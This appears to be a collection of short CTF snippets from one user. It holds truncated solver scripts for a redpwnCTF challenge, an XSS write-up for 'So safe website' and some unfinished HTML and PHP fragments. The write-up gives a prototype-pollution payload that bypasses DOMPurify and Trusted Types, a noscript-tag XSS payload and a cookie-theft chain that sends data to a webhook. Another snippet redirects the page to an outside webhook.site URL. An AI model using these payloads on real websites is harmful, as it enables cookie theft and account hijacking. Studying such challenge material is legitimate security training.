parrot409

#!/usr/bin/env python3
#Written by 0xParrot
#This is unintended solution.
import requests
import string
import base64
import random
import json
import time
flag = ""

parrot409

#!/usr/bin/env python3
#Written by 0xParrot
import requests
import uuid
import re
import base64

addr = "2020.redpwnc.tf:31291"
addrP = "http://2020.redpwnc.tf:31291"

parrot409

alert();

parrot409

So safe website

I inspired this challenge while i was playing a challenge by @53c0nd-2473.

1. Overwrite Object object's getOwnPropertyNames with "nice feature" to bypass dompurify + trusted types. {"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}
2. Bypass custom filter with noscript tag. example: <noscript><img src="</noscript><img src=1 onerror=alert()">
3. Steal cookies with using debug.js and set parent's name to cookies and do redirect with meta tag
4. Send window.name to your webhook.

parrot409

lmao

parrot409

f

parrot409

sdfsdf

parrot409

<script>
document.location = "https://webhook.site/01b6b49c-2e31-4fa4-8e0d-f87f208586e4"
</script>

parrot409

<html>
	<head>
		<title>rem rem rem</title>
	</head>
	<body>
		<div id="atk">
			
		</div>
		<script>
			// const TARGET = "http://localhost:8000"

parrot409

<?php
function conv($l){
	$g = unpack("C*", pack("Q",$l));
	$r = "";
	for($i=0;$i<8;$i++){
		if($g[$i] != 0){
			$r.= chr($g[$i]);
		}
	}
	return $r;